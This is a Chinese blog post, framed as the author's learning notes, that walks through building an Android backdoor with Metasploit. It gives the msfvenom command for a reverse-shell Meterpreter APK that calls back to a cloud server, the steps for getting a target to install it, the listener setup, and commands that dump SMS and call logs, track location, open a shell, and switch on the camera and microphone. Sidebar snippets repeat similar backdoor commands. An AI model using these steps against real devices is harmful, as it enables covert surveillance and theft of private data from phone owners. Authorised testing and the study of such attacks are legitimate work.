MSF渗透Android

已于 2024-05-28 16:14:47 修改
阅读量1k 收藏 17
点赞数 23
文章标签: 安全 linux android
于 2024-05-28 16:03:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yxisobai/article/details/139267147
版权

目录

一、云服务器配置

方法一:安装kali linux。因为服务商没有提供kali版本的系统版本,这里有个篇文章是用存储桶的方式制作kali镜像,通过自定义镜像安装《kali linux 云服务器,云服务器安装kali linux》。

方法二:安装centos 7 。在centos 7 上安装msf。安装方法

二、木马生成

三、渗透

四、msf常用命令:

五、总结:

记录一下学习渗透工具的使用。

原理:msf生成Android 后门木马,靶机运行木马实现反向链接攻击机。
靶机ip:随机

攻击机ip:111.229.***.*** (腾讯云服务器)

一、云服务器配置

方法一:安装kali linux。因为服务商没有提供kali版本的系统版本,这里有个篇文章是用存储桶的方式制作kali镜像,通过自定义镜像安装《kali linux 云服务器,云服务器安装kali linux》。

方法二:安装centos 7 。在centos 7 上安装msf。安装方法

渗透测试:CentOS 7 环境下 MSF 工具部署(Metasploit 渗透测试框架安装)》

二、木马生成

命令: msfvenom -p android/meterpreter/reverse_tcp LHOST= <本地ip>  LPORT=<本地端口号> R > <文件名>.apk
 

msfvenom -p android/meterpreter/reverse_tcp LHOST=111.229.***.*** LPORT=7788 R >test.apk

生成完成/root目录下生成test.apk

接下来就要把test.apk拿下来,发送到目标机上

我这里是用本地安装的kali虚拟机通过scp命令下载这个木马文件(因为本来就在本地安装过kali和xshell,所以就用scp和sz来传输文件,也可以用windows的cmd直接下载服务器文件:pscp命令,但是前提要安装PuTTY,并配置好环境变量)

scp root@111.229.***.***:/root/test.apk /root

sz /root/test.apk

这样文件就下载到本地了。接下来就是让靶机安装apk,并运行此apk。

三、渗透

服务器运行以下命令:

msfconsole #运行msf

 use exploit/multi/handler  #选择模块
 set payload android/meterpreter/reverse_tcp #选择攻击模块
 set LhOST 0.0.0.0 #填写自己主机的IP地址
 set lport 7788 #填写刚才生成木马时的端口号
 run

这样就是在进行监听了,现在就等靶机运行app。

当出现meterpreter>就说明已经渗透成功了。

dump_sms #获取所有短信

四、msf常用命令:

dump_calllog #获取通讯录
geolocate    #获取定位
shell        #运行靶机shell
webcam_chat  #与靶机视频
webcam_list  #获取靶机摄像头
webcam_stream #开启靶机摄像头监控
record_mic   #录音
webcam_snap  #拍照

五、总结:

网络软件不要乱下载,自己做测试的时候没做免杀手机能监测出病毒,但是被有心之人利用,通过捆绑,免杀等一系列操作,还是很难发现的。特别注意一下外挂等软件,xx助手等软件。 

Yang2023.
关注
  • 23
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
msf生成安卓渗透
a439017985的博客
02-24 4182
利用msf来hack android 1.msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -o test.apk 2.签名(可以不用) 1.keytool -genkey -v -keystore my-release-key.keystore -alias pentest -keyalg R
msf 渗透测试
06-05
msf渗透
MSF 内网渗透(案例)
热门推荐
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
MSF渗透测试android手机
永远是少年
06-15 4913
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF渗透测试android手机。 一、Android木马生成 二、Android木马安装 三、效果检验
利用MSF攻击Android
qq_45746768的博客
07-08 3779
利用Metasploit攻击Android
MSF模拟渗透测试之攻击Android
lza20001103的博客
04-09 6927
MSF渗透测试系列之攻击Android
Kali利用MSF渗透安卓手机
weixin_51641247的博客
03-29 5204
利用Kali渗透安卓手机; MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
我的MSFAndroid木马渗透的学习笔记
yuan_boss的博客
06-07 4387
使用kali制作Android木马并进行通讯录渗透的学习笔记
kali系统渗透android
鸣风
12-25 824
kali系统渗透安卓
MSF - Android
ShenMian000
10-05 796
更新中 Step 1 生成后门 msfvenom -p android/meterpreter/reverse_tcp LHOST=&amp;lt;本地IP&amp;gt; LPORT=&amp;lt;监听Port&amp;gt; R -o backdoor.apk 当目标执行后门时,MSF会向后门发送Payload。当Payload载入后即可开始控制目标。 Step 2 开启监听任务 msf &amp;gt; use use exp...
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
kali 渗透msf
11-14
kali渗透测试利器
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
msf内网渗透
10-29
msf内网渗透
VPS拨号服务器:独享的高效与安全
qq_34245974的博客
07-06 668
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
移动互联安全扩展要求测评项
最新发布
hakksjss的博客
07-10 811
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 944
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
msf渗透linux
09-07
MSF (Metasploit Framework) 是一个开源的渗透测试工具,用于评估和保护计算机系统的安全性。它提供了一系列的模块和工具,可以用于漏洞扫描、漏洞利用、远程控制和后渗透等活动。 在使用 MSF 进行 Linux 渗透测试时,可以使用不同的模块和命令来实现不同的目标。比如,可以使用 "exploit/multi/mysql/mysql_udf_payload" 模块来执行针对 MySQL 数据库的攻击,并利用已知的漏洞进行远程执行代码的操作。 运行 "run" 命令来执行该模块。同样地,可以使用 "exploit(windows/http/manageengine_connectionid_write)" 模块来针对 ManageEngine 连接标识写入漏洞进行攻击,并通过 "run" 命令来执行该模块。 除了执行攻击模块外,还可以使用 "set" 命令来设置模块的参数。例如,可以使用 "exploit(multi/mysql/mysql_udf_payload)" 模块并通过 "set username root" 命令将用户名设置为 "root"。 需要注意的是,MSF 是一个强大的工具,应该在合法和授权的环境中使用。在进行任何渗透测试活动之前,请确保已经获得了适当的授权和许可,并遵守法律和道德准则。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yang2023.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值